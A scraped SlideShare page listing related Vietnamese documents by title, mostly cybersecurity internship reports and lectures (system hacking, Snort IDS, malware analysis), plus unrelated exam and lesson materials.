An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfNuioKila
 
cybersecurity training.pptx
cybersecurity training.pptxcybersecurity training.pptx
cybersecurity training.pptxproperwellVN
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhạm Trung Đức
 
Bài gảng cơ sở an toàn thông tin PTIT
Bài gảng cơ sở an toàn thông tin PTITBài gảng cơ sở an toàn thông tin PTIT
Bài gảng cơ sở an toàn thông tin PTITNguynMinh294
 
Bài giảng quản lý mạng viễn thông tel 1414
Bài giảng quản lý mạng viễn thông tel 1414Bài giảng quản lý mạng viễn thông tel 1414
Bài giảng quản lý mạng viễn thông tel 1414nataliej4
 
Snort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.comSnort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.comphanleson
 
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSamTiki.vn
 

La actualidad más candente (20)

Giáo trình an toàn thông tin ths.nguyễn công nhật[bookbooming.com]
Giáo trình an toàn thông tin   ths.nguyễn công nhật[bookbooming.com]Giáo trình an toàn thông tin   ths.nguyễn công nhật[bookbooming.com]
Giáo trình an toàn thông tin ths.nguyễn công nhật[bookbooming.com]
 
Luận văn: Tìm hiểu chuẩn mật mã dữ liệu (DES) và ứng dụng, HOT
Luận văn: Tìm hiểu chuẩn mật mã dữ liệu (DES) và ứng dụng, HOTLuận văn: Tìm hiểu chuẩn mật mã dữ liệu (DES) và ứng dụng, HOT
Luận văn: Tìm hiểu chuẩn mật mã dữ liệu (DES) và ứng dụng, HOT
 
Tấn công Social Engineering
Tấn công Social EngineeringTấn công Social Engineering
Tấn công Social Engineering
 
Hướng dan su dung packet tracer
Hướng dan su dung packet tracerHướng dan su dung packet tracer
Hướng dan su dung packet tracer
 
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsKịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
 
Slide bai giang_an_toan_va_bao_mat_thong_tin
Slide bai giang_an_toan_va_bao_mat_thong_tinSlide bai giang_an_toan_va_bao_mat_thong_tin
Slide bai giang_an_toan_va_bao_mat_thong_tin
 
Virus
VirusVirus
Virus
 
IDS Snort/SnortSam
IDS Snort/SnortSamIDS Snort/SnortSam
IDS Snort/SnortSam
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh web
 
Cơ sở an toàn thông tin chương 2
Cơ sở an toàn thông tin chương 2Cơ sở an toàn thông tin chương 2
Cơ sở an toàn thông tin chương 2
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
 
Ids
Ids Ids
Ids
 
cybersecurity training.pptx
cybersecurity training.pptxcybersecurity training.pptx
cybersecurity training.pptx
 
Đề tài: Phần mềm Quản Lý Siêu Thị Mini, HAY, 9đ
Đề tài: Phần mềm Quản Lý Siêu Thị Mini, HAY, 9đĐề tài: Phần mềm Quản Lý Siêu Thị Mini, HAY, 9đ
Đề tài: Phần mềm Quản Lý Siêu Thị Mini, HAY, 9đ
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
Bài gảng cơ sở an toàn thông tin PTIT
Bài gảng cơ sở an toàn thông tin PTITBài gảng cơ sở an toàn thông tin PTIT
Bài gảng cơ sở an toàn thông tin PTIT
 
Bài giảng quản lý mạng viễn thông tel 1414
Bài giảng quản lý mạng viễn thông tel 1414Bài giảng quản lý mạng viễn thông tel 1414
Bài giảng quản lý mạng viễn thông tel 1414
 
Snort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.comSnort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.com
 
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam
[Khóa luận tốt nghiệp] - Tìm hiểu và triển khai Snort/SnortSam
 

Destacado

tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậtanhkhoa2222
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpLuc Cao
 
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạngDanh Tran
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanleokidd
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
 
Baocaothuctap athena
Baocaothuctap athenaBaocaothuctap athena
Baocaothuctap athenaTao Là Linh
 
de an system hacking
de an system hacking de an system hacking
de an system hacking Anh Bình
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng PhongPhong Hoang
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploitchungdv
 
CEH - Module 5 : System Hacking
CEH - Module 5 : System HackingCEH - Module 5 : System Hacking
CEH - Module 5 : System HackingAvirot Mitamura
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...MasterCode.vn
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...MasterCode.vn
 
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạngDanh Tran
 
Báo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingBáo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingAnhh Hữu
 

Destacado (20)

tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Luan van
Luan vanLuan van
Luan van
 
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
 
Baocaothuctap athena
Baocaothuctap athenaBaocaothuctap athena
Baocaothuctap athena
 
de an system hacking
de an system hacking de an system hacking
de an system hacking
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần application
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 
CEH - Module 5 : System Hacking
CEH - Module 5 : System HackingCEH - Module 5 : System Hacking
CEH - Module 5 : System Hacking
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
 
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
 
Báo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingBáo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hacking
 

Similar a Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ

Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Tan Huynh
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳLong Prồ
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
Bao cao giua ki
Bao cao giua kiBao cao giua ki
Bao cao giua kithach28
 
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)Lướt net an toàn
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaQuý Đồng Nast
 
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng pythonBáo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng pythonjackjohn45
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaMinhThien3715
 

Similar a Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ (20)

Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Bao cao giua ki
Bao cao giua kiBao cao giua ki
Bao cao giua ki
 
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạngĐề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
 
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athena
 
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng pythonBáo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
 
Báo cáo
Báo cáoBáo cáo
Báo cáo
 
Báo cáo athena
Báo cáo  athenaBáo cáo  athena
Báo cáo athena
 
Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAYĐề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mởPhát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
baocao1
baocao1baocao1
baocao1
 

Último

ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...Nguyen Thanh Tu Collection
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếngTonH1
 
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ haoBookoTime
 
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...Nguyen Thanh Tu Collection
 
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptxCHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx22146042
 
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...Nguyen Thanh Tu Collection
 
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfLinh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfXem Số Mệnh
 
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHTư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHThaoPhuong154017
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Nguyen Thanh Tu Collection
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...Nguyen Thanh Tu Collection
 
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...Nguyen Thanh Tu Collection
 
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hardBookoTime
 
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Xem Số Mệnh
 
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...Nguyen Thanh Tu Collection
 
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiNhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiTruongThiDiemQuynhQP
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Nguyen Thanh Tu Collection
 
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )lamdapoet123
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...PhcTrn274398
 

Último (20)

ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tế
 
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao
1第一课:你好.pptx. Chinese lesson 1: Hello.Nỉ hao
 
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
